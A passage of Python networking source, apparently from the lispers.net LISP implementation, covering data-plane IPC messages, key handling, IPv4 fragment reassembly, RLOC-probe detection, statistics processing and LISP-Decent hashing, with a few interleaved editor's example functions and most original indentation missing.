# affected. The lisp_rloc_probe_list has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
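#
# An illustrative JSON record for a unicast map-cache entry as written to
# the named socket:
#
# { "type" : "map-cache", "opcode" : "add", "eid-prefix" : "10.0.0.0/8",
#   "instance-id" : "1000", "rlocs" : [ { "rloc" : "1.1.1.1",
#   "priority" : "1", "weight" : "100", "port" : "4341" } ] }
#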
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store decryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write the database-mappings to the ipc-data-plane
# socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-itr process, write the interface to instance-ID mappings to
# the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in list(lisp_myinterfaces.values()):
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
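#
# Editor's illustrative sketch, not part of the original lispers.net source:
# the three documented "authentication-key" forms parse as asserted below.
# Note the multi-key form keeps the trailing space separator in each password
# value except the last.
#
def lisp_example_parse_auth_key():
    assert lisp_parse_auth_key("secret") == {0 : "secret"}
    assert lisp_parse_auth_key("[3]secret") == {3 : "secret"}
    assert lisp_parse_auth_key("[1]pw1 [2]pw2") == {1 : "pw1 ", 2 : "pw2"}
#enddef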
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
    # Initialize the list if this is the first fragment. Indexed by IPv4 Ident.
#
if (ident not in lisp_reassembly_queue):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
    # Do not queue the fragment if the first fragment arrived and we determined
    # it's not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
    # If we did not return, we have all fragments. Now append them. Keep the
    # IP header in the first fragment but remove it from each subsequent
    # fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
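#
# Editor's illustrative sketch, not part of the original lispers.net source:
# the "all fragments arrived" test above, in isolation. A sorted queue is
# complete when it starts at offset 0, ends with the last-fragment flag set,
# and each fragment begins exactly where the previous one ended.
#
def lisp_example_fragments_complete(queue):
    if (queue[0][0] != 0 or queue[-1][3] == False): return(False)
    last_fo, last_fl = queue[0][0], queue[0][1]
    for frag in queue[1::]:
        if (last_fo + last_fl != frag[0]): return(False)
        last_fo, last_fl = frag[0], frag[1]
    #endfor
    return(True)
#enddef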
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr> in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)
addr_str = addr.print_address_no_iid()
if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)
#
    # We are at a non-NAT based xTR. We need to get the keys from an RTR
    # or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (addr in lisp_rloc_probe_list): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
        # so we don't do a full table traversal. But this only happens rarely.
#
for nat_info in list(lisp_nat_state_info.values()):
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
        #endfor
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9:10])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28:29])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28:29])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28:29])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28:29])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8:9])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
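#
# Editor's illustrative sketch, not part of the original lispers.net source:
# how an ETR would use lisp_is_rloc_probe() on a pcap'ed IPv4 packet, per the
# rr contract described above (rr=0 checks for a Map-Request RLOC-probe).
# Returns None both for non-probes and for probes we sent ourselves.
#
def lisp_example_check_etr_rloc_probe(ipv4_packet):
    packet, source, port, ttl = lisp_is_rloc_probe(ipv4_packet, 0)
    if (source == None): return(None)
    return((packet, source, port, ttl))
#enddef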
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if ("entries" not in msg):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if ("eid-prefix" not in msg):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if ("instance-id" not in msg):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if ("rlocs" not in msg):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if ("rloc" not in ipc_rloc): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ("packet-count" not in ipc_rloc) else \
ipc_rloc["packet-count"]
bc = 0 if ("byte-count" not in ipc_rloc) else \
ipc_rloc["byte-count"]
ts = 0 if ("seconds-last-packet" not in ipc_rloc) else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
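#
# Editor's illustrative sketch, not part of the original lispers.net source:
# a minimal "statistics" IPC message in the format documented above, with
# made-up addresses and counters.
#
lisp_example_stats_ipc_message = {
    "type" : "statistics",
    "entries" : [
        { "instance-id" : "0", "eid-prefix" : "10.0.0.0/8", "rlocs" : [
            { "rloc" : "192.0.2.1", "packet-count" : 10,
              "byte-count" : 14000, "seconds-last-packet" : 5 } ] }
    ]
}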
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR, we
# need to send an IPC message to the lisp-etr process.
#
# Variable "msg" is a string and not a byte string. Caller converts.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
    # Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
    # is a dictionary array when the ITR/RTR is processing it. When an ETR
    # is processing it, it received a json string from the ITR so it needs
    # to convert it to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if (key_name not in msg) else msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if (key_name not in msg) else msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if (key_name not in msg) else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The JSON messages come
# in types "discovery", "restart", "statistics", and "decap-statistics".
# This function calls helper functions for the stats and restart types and
# itself processes the logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if ("type" not in msg):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
    # Process restart message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if ("interface" not in msg):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if ("source-eid" in msg):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if ("dest-eid" in msg):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or lisp_mr_or_pubsub(mc.action)):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
pubsub = (mc and mc.action == LISP_SEND_PUBSUB_ACTION)
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None, pubsub)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
    lisp_ipc_listen_socket=None):
eid_str = eid.print_address()
if (eid_str in db.dynamic_eids):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
    #
    # Tell ETR process so it can register dynamic-EID. The punt code path
    # calls this function without a listen socket, so only send the IPC when
    # a socket was supplied.
    #
    if (lisp_ipc_listen_socket != None):
        ipc = "learn%{}%{}".format(eid_str, routed_interface)
        ipc = lisp_command_ipc(ipc, "lisp-itr")
        lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
    #endif
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
    #endfor
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value. We
# do a sha256() over a string representation of "[<iid>]<eid>", take the
# high-order 6 bytes from the hash and do the modulus on that value.
#
# The seed/password for the sha256 hash is the string "lisp-decent".
#
def lisp_get_decent_index(eid):
    eid_str = eid.print_prefix().encode()
    hash_value = hmac.new(b"lisp-decent", eid_str, hashlib.sha256).hexdigest()
#
# Get hash-length to modulate from LISP_DECENT_HASH_WIDTH in bytes.
#
hash_width = os.getenv("LISP_DECENT_HASH_WIDTH")
if (hash_width in ["", None]):
hash_width = 12
else:
hash_width = int(hash_width)
if (hash_width > 32):
hash_width = 12
else:
hash_width *= 2
#endif
#endif
mod_value = hash_value[0:hash_width]
index = int(mod_value, 16) % lisp_decent_modulus
lprint("LISP-Decent modulus {}, hash-width {}, mod-value {}, index {}". \
format(lisp_decent_modulus, old_div(hash_width, 2) , mod_value, index))
return(index)
#enddef
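#
# Editor's illustrative sketch, not part of the original lispers.net source:
# the index computation above in isolation, with the default 12 hex-digit
# (6-byte) hash width and a made-up modulus of 16.
#
def lisp_example_decent_index(eid_prefix_str, modulus=16):
    h = hmac.new(b"lisp-decent", eid_prefix_str.encode(),
        hashlib.sha256).hexdigest()
    return(int(h[0:12], 16) % modulus)
#enddef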
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# The supplied EID is an address passed as a string. Build an internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
